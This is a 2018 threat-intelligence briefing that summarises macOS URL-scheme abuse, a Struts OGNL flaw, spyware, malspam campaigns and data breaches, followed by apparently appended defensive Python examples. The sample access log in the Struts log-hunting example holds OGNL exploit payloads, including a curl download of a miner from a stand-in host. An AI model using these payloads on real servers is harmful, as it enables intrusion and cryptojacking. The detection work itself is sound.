September 4, 2018 - Anomali Threat Research

Weekly Threat Briefing: Remote Mac Exploitation via Custom URL Schemes

<div id="weekly"><p id="intro">The intelligence in this week’s iteration discusses the following threats: <strong>Anonymous, Apache Struts vulnerability, BusyGasper, Cobalt Gang, DarkComet, DDoS, Loki Bot, Spear phishing, </strong>and<strong> WINDSHIFT APT.</strong> The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><div id="trending-threats"><h1 id="trendingthreats">Trending Threats</h1><p><a href="https://objective-see.com/blog/blog_0x38.html" target="_blank"><b>Remote Mac Exploitation Via Custom URL Schemes</b></a> (<i>August 30, 2018</i>)<br/> An obscure Advanced Persistent Threat (APT) group called WINDSHIFT has been seen abusing a macOS behaviour to target government institutions in the Middle East, in what appears to be the first stage of a two-stage campaign. This first stage is intended to gain initial access to a fully patched macOS system and pave the way for a later second stage. The technique abuses custom URL schemes in the Safari browser to remotely infect macOS targets. It requires a minimal amount of user interaction, and the prompts the user does see can be "influenced" by the APT group as needed. The first stage takes advantage of the way macOS registers document handlers and custom URL schemes: Safari’s default "Open ‘safe’ files after downloading" behaviour automatically unzips a malicious archive that a phishing email has led the victim to download, and once the archive is extracted the malicious application inside it sits on the filesystem, which causes macOS to register the custom URL scheme handler declared in the application’s bundle.
The attacker’s web page can then invoke that custom URL, which launches the malicious application on the user’s computer and gives the threat actor access to the system.<br/> <a href="https://forum.anomali.com/t/remote-mac-exploitation-via-custom-url-schemes/2878" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/remote-mac-exploitation-via-custom-url-schemes/2878" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/remote-mac-exploitation-via-custom-url-schemes/2878" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947281">[MITRE ATT&amp;CK] Launch Daemon (T1160)</a></p><p><a href="https://asert.arbornetworks.com/double-the-infection-double-the-fun/" target="_blank"><b>Double The Infection, Double The Fun</b></a> (<i>August 30, 2018</i>)<br/> The threat group Cobalt Gang (also known as TEMP.Metastrike) is suspected of attacking financial organizations in several countries. Researchers at ASERT have observed a new campaign targeting institutions in Romania and Russia that uses spear phishing emails purporting to come from financial vendors or partners to trick users into opening the malicious attachments. The attachments are either a Word document containing obfuscated VBA scripts or a binary with a JPG extension.
Both send information to command and control (C2) servers operated by Cobalt Gang.<br/> <a href="https://forum.anomali.com/t/double-the-infection-double-the-fun/2879" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/double-the-infection-double-the-fun/2879" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/double-the-infection-double-the-fun/2879" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947197">[MITRE ATT&amp;CK] CMSTP (T1191)</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p><p><a href="https://www.infosecurity-magazine.com/news/crypto-jackers-exploit-critical/" target="_blank"><b>Cryptojackers Exploit Critical Apache Struts Flaw</b></a> (<i>August 30, 2018</i>)<br/> Security researchers from Volexity have recently seen a critical Apache Struts vulnerability being exploited in the wild to install a popular cryptocurrency miner on targeted machines.
The vulnerability, tracked as CVE-2018-11776, stems from improper validation of namespace input: an attacker-supplied OGNL expression placed in the URL is evaluated by the framework. Threat actors have already exploited it to install the CNRig cryptocurrency miner on vulnerable servers.<br/> <b><a href="https://forum.anomali.com/t/cryptojackers-exploit-critical-apache-struts-flaw/2880" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/cryptojackers-exploit-critical-apache-struts-flaw/2880" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/cryptojackers-exploit-critical-apache-struts-flaw/2880" target="_blank"> recommendation</a><br/> MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947209">[MITRE ATT&amp;CK] Third-party Software (T1072)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/anonymous-catalonia-claims-ddos-attack-on-bank-of-spain-website/" target="_blank"><b>Anonymous Catalonia Claims DDoS Attack On Bank of Spain Website</b></a> (<i>August 30, 2018</i>)<br/> The hacktivist group Anonymous Catalonia claimed a Distributed Denial of Service (DDoS) attack on Banco de España that left the bank’s website offline and unusable for two days. The group announced the attack on Twitter using the hashtag “TangoDown” to indicate that the bank’s web server was down globally. The group targeted the bank, among others, to protest the arrests of Catalan leaders who took part in last year’s independence referendum, which Spain deemed illegal. Banco de España stated that while its website was down, none of its normal operations were affected.
This is a continuation of attacks on various Spanish legal entities following the unsuccessful referendum last year and the so-called “hurting of Catalan people” that this group claims the government is responsible for.<br/> <a href="https://forum.anomali.com/t/anonymous-catalonia-claims-ddos-attack-on-bank-of-spain-website/2881" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/anonymous-catalonia-claims-ddos-attack-on-bank-of-spain-website/2881" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/anonymous-catalonia-claims-ddos-attack-on-bank-of-spain-website/2881" target="_blank"><b> recommendation</b></a></p><p><a href="https://nakedsecurity.sophos.com/2018/08/30/air-canada-resets-1-7-million-accounts-after-app-breach/" target="_blank"><b>Air Canada Resets 1.7 Million Accounts After App Breach</b></a> (<i>August 30, 2018</i>)<br/> Air Canada issued password resets to over 1.7 million customers using its mobile application following a data breach that affected 20,000 accounts. Unusual login behavior was detected between August 22 and 24, 2018, and the airline proceeded to block further access. The data compromised includes: names, email addresses, telephone numbers, and Air Canada Aeroplan account numbers. The other data compromised in this breach, which is more worrying, includes passport numbers, NEXUS numbers (allows for quicker access over some borders), traveler numbers, gender, date of birth, nationality, passport expiry date, country of issuance, and country of residence. 
The airline reports that credit card numbers were encrypted and therefore were not exposed by the breach.<br/> <a href="https://forum.anomali.com/t/air-canada-resets-1-7-million-accounts-after-app-breach/2882" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/air-canada-resets-1-7-million-accounts-after-app-breach/2882" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/air-canada-resets-1-7-million-accounts-after-app-breach/2882" target="_blank"><b> recommendation</b></a></p><p><a href="https://securelist.com/busygasper-the-unfriendly-spy/87627/" target="_blank"><b>BusyGasper – The Unfriendly Spy </b></a> (<i>August 29, 2018</i>)<br/> Security researchers from Kaspersky Lab uncovered a new family of Android spyware dubbed “BusyGasper.” While the malware is not especially sophisticated, it supports a broad range of commands: it can log every keystroke, exfiltrate data from messaging applications such as WhatsApp and Viber, and bypass the Doze battery saver. The malware fetches payloads from a command and control (C2) server hosted on Ucoz, a free Russian web hosting service. It is unusual in that the initial infection vector appears to require physical access: the threat actor must get hold of the target’s device and install the malware by hand. Consistent with that requirement, researchers have seen fewer than ten victims, all of them located in Russia.
Although the threat actors gained access to victims’ bank account information, the attack does not appear to be financially motivated.<br/> <a href="https://forum.anomali.com/t/busygasper-the-unfriendly-spy/2883" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/busygasper-the-unfriendly-spy/2883" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/busygasper-the-unfriendly-spy/2883" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947289">[MITRE ATT&amp;CK] Custom Command and Control Protocol (T1094)</a></p><p><a href="https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" target="_blank"><b>Loki Bot: On A Hunt For Corporate Passwords </b></a> (<i>August 29, 2018</i>)<br/> Researchers from Kaspersky Lab have discovered a malspam campaign distributing the Loki Bot malware through phishing emails. The emails target corporate users and rely on three types of lure to get the recipient to open the message and its malicious attachment: fake emails purporting to come from real companies (usually about payments, invoices or shipping statements), fake emails carrying financial documents for review, and fake emails containing bogus order confirmations or offers of services.
If the target opens the malicious attachment, Loki Bot steals credentials that can give the threat actors access to intellectual property, databases, bank accounts, system credentials and more.<br/> <a href="https://forum.anomali.com/t/loki-bot-on-a-hunt-for-corporate-passwords/2884" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/loki-bot-on-a-hunt-for-corporate-passwords/2884" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/loki-bot-on-a-hunt-for-corporate-passwords/2884" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p><p><a href="https://latesthackingnews.com/2018/08/29/microsoft-windows-zero-day-vulnerability-is-disclosed-on-twitter/" target="_blank"><b>Microsoft Windows Zero-Day Vulnerability Is Disclosed On Twitter </b></a> (<i>August 29, 2018</i>)<br/> A Twitter user named “SandboxEscaper” disclosed a zero-day vulnerability in Microsoft Windows. The flaw is a local privilege escalation in the Task Scheduler’s Advanced Local Procedure Call (ALPC) interface. It allows a threat actor who already has code running on the machine to obtain SYSTEM privileges, and there is currently no known workaround. Microsoft stated that it will release a patch next month.
SandboxEscaper had earlier attempted to sell the vulnerability on Reddit, but the posts were removed, and it is unclear whether a sale was made before they were taken down.<br/> <a href="https://forum.anomali.com/t/microsoft-windows-zero-day-vulnerability-is-disclosed-on-twitter/2885" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/microsoft-windows-zero-day-vulnerability-is-disclosed-on-twitter/2885" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/microsoft-windows-zero-day-vulnerability-is-disclosed-on-twitter/2885" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947233">[MITRE ATT&amp;CK] Exploitation for Privilege Escalation (T1068)</a></p><p><a href="https://www.theregister.co.uk/2018/08/29/android_external_storage_man_in_the_disk/" target="_blank"><b>We're All Sick Of Fortnite, But The Flaw Found In Its Downloader Is The Latest Way To Attack Android</b></a> (<i>August 29, 2018</i>)<br/> The Android installer for the popular game Fortnite has been found to contain a vulnerability that allows a “man-in-the-disk” attack. This type of attack abuses the fact that Android’s external storage is readable and writable by any application holding the storage permission: a malicious app can wait for another app to write a file to external storage and modify that file with malicious content before it is read back. Fortnite for Android is installed through a helper application, which downloads the game file to the device’s external storage before installing it.
A malicious app already present on the device can therefore replace the downloaded game file with its own package before the helper installs it, giving the threat actor code execution on the device.<br/> <a href="https://forum.anomali.com/t/were-all-sick-of-fortnite-but-the-flaw-found-in-its-downloader-is-the-latest-way-to-attack-android/2886" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/were-all-sick-of-fortnite-but-the-flaw-found-in-its-downloader-is-the-latest-way-to-attack-android/2886" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/were-all-sick-of-fortnite-but-the-flaw-found-in-its-downloader-is-the-latest-way-to-attack-android/2886" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947134">[MITRE ATT&amp;CK] Replication Through Removable Media (T1091)</a> | <a href="https://ui.threatstream.com/ttp/947264">[MITRE ATT&amp;CK] Hardware Additions (T1200)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/beware-of-fake-shipping-docs-malspam-pushing-the-darkcomet-rat/" target="_blank"><b>Beware Of Fake "Shipping Docs" Malspam Pushing The DarkComet RAT </b></a> (<i>August 28, 2018</i>)<br/> Security researcher Vishal Thakur has discovered a malspam campaign that sends emails posing as shipment notices and carrying a malicious attachment. The attachment is presented as a shipping document awaiting the recipient’s review and approval. It is delivered as a .z archive and, if opened, installs the DarkComet Remote Access Trojan (RAT).
DarkComet then lets the threat actors log the infected machine’s keystrokes, monitor application use and take screenshots, among other things.<br/> <a href="https://forum.anomali.com/t/beware-of-fake-shipping-docs-malspam-pushing-the-darkcomet-rat/2887" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/beware-of-fake-shipping-docs-malspam-pushing-the-darkcomet-rat/2887" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/beware-of-fake-shipping-docs-malspam-pushing-the-darkcomet-rat/2887" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools (T1219)</a></p><p><a href="https://research.checkpoint.com/ceidpagelock-a-chinese-rootkit/" target="_blank"><b>CeidPageLock: A Chinese RootKit </b></a> (<i>August 28, 2018</i>)<br/> Check Point researchers have found a new version of the browser-hijacking rootkit “CEIDPageLock” being distributed by the RIG exploit kit. CEIDPageLock manipulates the victim’s browser and sets the homepage to a Chinese web directory, 2345.com. The new version also monitors the user’s browsing and replaces the content of popular Chinese sites with a fake 2345.com homepage. The operators can thereby track which sites victims visit and how long they stay on each, information that can drive targeted advertising campaigns or be sold to other companies. Most victims are in China, but victims in the UK, Taiwan, Hong Kong, the US, Denmark and Japan were also observed. CEIDPageLock is most likely delivered through RIG’s landing page, which exploits a browser vulnerability to gain code execution.
From there, the malware dropper is downloaded; it extracts the driver embedded within itself and saves it in the “\Windows\Temp” directory as “houzi.sys.” The dropper then starts the malicious 32-bit driver, which connects to hard-coded command and control (C2) domains to download the 2345.com homepage configuration. This version of CEIDPageLock is packed with VMProtect, which makes analysis and unpacking difficult, and it redirects victims to the configured homepage when they attempt to access specific Chinese websites.<br/> <a href="https://forum.anomali.com/t/ceidpagelock-a-chinese-rootkit/2888" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/ceidpagelock-a-chinese-rootkit/2888" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/ceidpagelock-a-chinese-rootkit/2888" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947092">[MITRE ATT&amp;CK] Rootkit (T1014)</a> | <a href="https://ui.threatstream.com/ttp/947181">[MITRE ATT&amp;CK] Kernel Modules and Extensions (T1215)</a> | <a href="https://ui.threatstream.com/ttp/947173">[MITRE ATT&amp;CK] Hooking (T1179)</a></p><p><a href="https://techcrunch.com/2018/08/27/abbyy-leaked-203000-sensitive-customer-documents-in-server-lapse/" target="_blank"><b>Abbyy Leaked 203,000 Sensitive Customer Documents In Server Lapse </b></a> (<i>August 27, 2018</i>)<br/> Abbyy, a maker of optical character recognition (OCR) software, exposed sensitive customer data through a database server that was left on the Internet without a password. The company’s MongoDB server was misconfigured such that more than 203,000 sensitive documents, dating from 2012 to the present, were publicly accessible. The server was taken offline after the exposure was privately reported to the company.
According to the company, the exposure affected a single customer and files containing commercial information; that customer has been notified, and Abbyy says it has taken corrective measures. The company has not said whether unauthorized parties accessed the database while it was exposed.<br/> <a href="https://forum.anomali.com/t/abbyy-leaked-203-000-sensitive-customer-documents-in-server-lapse/2889" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/abbyy-leaked-203-000-sensitive-customer-documents-in-server-lapse/2889" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/abbyy-leaked-203-000-sensitive-customer-documents-in-server-lapse/2889" target="_blank"><b> recommendation</b></a></p></div><div id="observed-threats"><h1 id="observedthreats">Observed Threats</h1><p>This section includes the top threats observed from the Anomali Community user base as well as sensors deployed by Anomali Labs. A ThreatStream account is required to view this section. <a href="https://www.anomali.com/products/threatstream" target="_blank">Click here to request a trial</a>. Additional information regarding the threats discussed in this week’s Community Threat Briefing can be found below:</p></div><div id="threat_model"><div id="threat_model_ttp"><a href="https://ui.threatstream.com/ttp/59090" target="_blank">Spear Phishing</a><br/> Spear phishing is a tactic in which a threat actor targets a specific business, individual, or organization via email or another form of electronic communication while tricking the recipient into thinking the message originated from an authentic source. The objective of spear phishing is to gain an initial infection vector into a particular company’s or individual’s network. Threat actors attempt to make the communication appear to originate from a source the recipient is familiar with and/or deems trustworthy. 
Spear phishing is used by all levels of threat actors, including Advanced Persistent Threat (APT) groups.</div><div id="threat_model_vulnerability"> </div></div></div>
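Three of the items above (Cobalt Gang's "binary with a JPG extension", the Loki Bot invoice and shipping lures, and the DarkComet ".z" shipping document) come down to the same triage question: does the attachment's content match what its name claims, and is the extension one that should never arrive from a vendor? The following is an added example, not code from the briefing or from any vendor named in it. It parses a mail message with Python's standard `email` module, sniffs each attachment's leading bytes, and flags risky extensions, double extensions and name/content mismatches. The message, addresses and attachment bytes are constructed for illustration, and the extension and magic-byte tables are small illustrative sets rather than complete lists.

```python
"""Triage e-mail attachments for the lure types in this briefing.

Added example, not code from the briefing or from any vendor named in it. The
message is constructed inline; the extension and magic-byte tables are small
illustrative sets, not complete lists.
"""
import email
import email.policy
import re
from email.message import EmailMessage

# Attachment extensions used by the lures above or commonly abused in malspam.
RISKY_EXTENSIONS = {".z", ".zip", ".rar", ".7z", ".iso", ".exe", ".scr", ".js",
                    ".vbs", ".jar", ".doc", ".docm", ".xls", ".xlsm", ".rtf"}

# Leading bytes of a few formats; enough to catch a PE binary renamed to .jpg.
MAGIC = {
    b"MZ": "pe-executable",
    b"PK\x03\x04": "zip-container",    # also OOXML (.docx/.xlsx) and .jar
    b"\xd0\xcf\x11\xe0": "ole2",        # legacy .doc/.xls, the usual VBA carriers
    b"\xff\xd8\xff": "jpeg",
    b"%PDF": "pdf",
    b"Rar!": "rar",
}

def sniff(data: bytes) -> str:
    """Identify the content type from leading bytes, ignoring the filename."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"

def extension(filename: str) -> str:
    match = re.search(r"(\.[A-Za-z0-9]{1,5})$", filename or "")
    return match.group(1).lower() if match else ""

def triage_attachment(filename: str, data: bytes) -> list:
    """Return the reasons (possibly none) an attachment deserves a closer look."""
    reasons = []
    ext = extension(filename)
    kind = sniff(data)
    if ext in RISKY_EXTENSIONS:
        reasons.append(f"risky extension {ext}")
    if re.search(r"\.[A-Za-z0-9]{2,4}\.[A-Za-z0-9]{2,4}$", filename or ""):
        reasons.append("double extension")          # e.g. invoice.pdf.exe
    if ext in {".jpg", ".jpeg"} and kind not in ("jpeg", "unknown"):
        reasons.append(f"extension {ext} but content is {kind}")
    if kind == "pe-executable":
        reasons.append("PE executable")
    return reasons

def triage_message(raw: bytes) -> dict:
    """Map each suspicious attachment name to its list of reasons."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    findings = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        reasons = triage_attachment(name, part.get_payload(decode=True) or b"")
        if reasons:
            findings[name] = reasons
    return findings

def build_sample_message() -> bytes:
    """Constructed message modelled on the 'shipping docs' and invoice lures."""
    msg = EmailMessage()
    msg["From"] = "billing@vendor.example"
    msg["To"] = "accounts@victim.example"
    msg["Subject"] = "Shipping Docs - please approve"
    msg.set_content("Please review and approve the attached documents.")
    # A PE binary masquerading as a photo (the 'binary with a JPG extension').
    msg.add_attachment(b"MZ\x90\x00" + b"\x00" * 60,
                       maintype="image", subtype="jpeg", filename="scan_0042.jpg")
    # A .z archive like the DarkComet lure (1f 9d is the compress(1) header).
    msg.add_attachment(b"\x1f\x9d" + b"\x00" * 16,
                       maintype="application", subtype="octet-stream",
                       filename="Shipping Docs.z")
    # A genuine JPEG as a benign control.
    msg.add_attachment(b"\xff\xd8\xff\xe0" + b"\x00" * 16,
                       maintype="image", subtype="jpeg", filename="logo.jpg")
    return msg.as_bytes()

if __name__ == "__main__":
    for name, reasons in triage_message(build_sample_message()).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The point of sniffing bytes rather than trusting the declared MIME type or the filename is that the Cobalt Gang sample would pass a filter that only looks at extensions; conversely, a macro-bearing `.doc` passes the byte check (it really is an OLE2 file) and is caught by the extension list instead, which is why both checks are kept.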
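The WINDSHIFT item above rests on two macOS behaviours that are both auditable: Safari's "Open 'safe' files after downloading" setting, which unzips the archive without a click, and Launch Services registering any `CFBundleURLTypes` declared in an app bundle's `Info.plist` as soon as the bundle lands on disk. The following is an added example, not code from Objective-See or from the briefing. It parses a bundle's `Info.plist` with the standard `plistlib` module, lists the URL schemes it registers, and flags the combination a hunter would care about: a scheme handler sitting in a download location rather than under `/Applications`. The `Info.plist`, the scheme name `openreport` and the set of download directories are constructed assumptions for illustration; the Safari preference key `AutoOpenSafeDownloads` is the real key, read here from a dictionary so the check runs anywhere.

```python
"""Audit an application bundle for custom URL scheme registrations.

Added example, not code from Objective-See or from the briefing. The Info.plist
below is constructed; the scheme name "openreport" and DOWNLOAD_DIRS are
assumptions made for illustration.
"""
import plistlib
from pathlib import PurePosixPath

SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key><string>com.example.report</string>
  <key>CFBundleExecutable</key><string>Report</string>
  <key>CFBundleURLTypes</key>
  <array>
    <dict>
      <key>CFBundleURLName</key><string>Report link handler</string>
      <key>CFBundleURLSchemes</key>
      <array><string>openreport</string></array>
    </dict>
  </array>
</dict>
</plist>
"""

# Places where a bundle that Safari just downloaded and auto-extracted lands.
# A URL-scheme handler living here, rather than under /Applications, is the
# footprint of the first stage described in the briefing. (Assumed list.)
DOWNLOAD_DIRS = {"Downloads", "Desktop", "tmp", "Temporary Items"}

def url_schemes(info_plist: bytes) -> list:
    """Every URL scheme declared under CFBundleURLTypes -> CFBundleURLSchemes."""
    info = plistlib.loads(info_plist)
    schemes = []
    for url_type in info.get("CFBundleURLTypes", []):
        schemes.extend(s.lower() for s in url_type.get("CFBundleURLSchemes", []))
    return schemes

def assess_bundle(bundle_path: str, info_plist: bytes) -> dict:
    """Flag a bundle that registers a scheme from a download location."""
    schemes = url_schemes(info_plist)
    in_download_dir = any(part in DOWNLOAD_DIRS
                          for part in PurePosixPath(bundle_path).parts)
    return {
        "bundle": bundle_path,
        "bundle_id": plistlib.loads(info_plist).get("CFBundleIdentifier", ""),
        "schemes": schemes,
        "suspicious": bool(schemes) and in_download_dir,
    }

def audit_bundle_on_disk(bundle_dir: str) -> dict:
    """Read Contents/Info.plist from a real .app directory (macOS only)."""
    with open(f"{bundle_dir}/Contents/Info.plist", "rb") as fh:
        return assess_bundle(bundle_dir, fh.read())

def safari_auto_open_enabled(safari_prefs: dict) -> bool:
    """Safari's 'Open "safe" files after downloading' switch.

    The key is AutoOpenSafeDownloads in the com.apple.Safari preference domain
    and it defaults to true when absent, which is what lets the archive unzip
    without a click. Obtain the live value with
    `defaults read com.apple.Safari AutoOpenSafeDownloads`."""
    return bool(safari_prefs.get("AutoOpenSafeDownloads", True))

if __name__ == "__main__":
    for path in ("/Users/alice/Downloads/Report.app", "/Applications/Report.app"):
        print(assess_bundle(path, SAMPLE_INFO_PLIST))
```

On a live Mac the plist check tells you what a bundle *declares*; what Launch Services actually *registered* is listed by `lsregister -dump` (under `/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/`), and comparing the two is how you catch a handler whose bundle has since been deleted. Note that Safari still prompts before handing a custom URL to its handler, so this check complements rather than replaces user awareness; the briefing's point is that the prompt can be made to look benign.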
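The Apache Struts item above says CVE-2018-11776 is "improper validation of namespace input"; in practice that means an OGNL expression such as `${...}` placed in the path segment Struts uses as the action namespace, which is something a web-server access log preserves. The following is an added example, not code from Volexity or from the briefing: a small hunt over Common Log Format lines that URL-decodes each request path and flags an OGNL opener in it. The log lines, IP addresses and payloads are constructed for illustration (the payload is abbreviated from the shape of public proofs of concept), and the keyword list only enriches the alert, it does not decide it.

```python
"""Hunt web-server access logs for the OGNL-in-path pattern used against
CVE-2018-11776.

Added example, not code from Volexity or from the briefing. The log lines and
IP addresses are constructed; the OGNL payload is shortened for readability.
"""
import re
from urllib.parse import unquote

SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [30/Aug/2018:10:15:02 +0000] "GET /showcase/index.action HTTP/1.1" 200 5123
203.0.113.9 - - [30/Aug/2018:10:15:07 +0000] "GET /showcase/%24%7B%28%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23cmd%3D%27id%27%29%7D/actionChain1.action HTTP/1.1" 302 0
203.0.113.9 - - [30/Aug/2018:10:15:09 +0000] "GET /showcase/${(#cmd='curl%20-O%20http://198.51.100.5/cnrig')}/help.action HTTP/1.1" 302 0
198.51.100.20 - - [30/Aug/2018:10:16:00 +0000] "GET /static/app.css?v=${version} HTTP/1.1" 200 811
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# An OGNL expression opener, ${...} or %{...}, after URL decoding.
OGNL_OPEN_RE = re.compile(r"[$%]\{")
# Fragments common to public exploit payloads; used only to enrich the alert.
OGNL_KEYWORDS = ("_memberAccess", "ognl.OgnlContext", "getRuntime",
                 "ProcessBuilder", "#cmd")

def ognl_in_path(target: str) -> tuple:
    """Return (suspicious, reason) for one request target.

    Only the path is inspected: the namespace flaw is triggered by an OGNL
    expression in the path segment that Struts takes as the action namespace
    (public exploits look like /${...}/someAction.action), so a ${...} in a
    query string is not evidence of this particular attack."""
    path = target.split("?", 1)[0]
    decoded = unquote(unquote(path))          # tolerate double encoding
    if not OGNL_OPEN_RE.search(decoded):
        return False, ""
    hits = [k for k in OGNL_KEYWORDS if k in decoded]
    return True, ", ".join(hits) if hits else "OGNL expression in path segment"

def scan_access_log(text: str) -> list:
    """Return (client_ip, request_target, reason) for each suspicious line."""
    alerts = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        suspicious, reason = ognl_in_path(match.group("target"))
        if suspicious:
            alerts.append((line.split(" ", 1)[0], match.group("target"), reason))
    return alerts

if __name__ == "__main__":
    for ip, target, reason in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{ip} {reason}\n    {target}")
```

Two caveats a practitioner would add: this only sees what reached the web tier, so a Struts instance behind a proxy that normalises or rejects `{` in paths will show nothing here even if it is unpatched, and a `302` response to such a request (as in the sample) is consistent with the redirect-based exploit variants, not proof of success; confirm by looking for the miner process or its outbound connection on the host.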
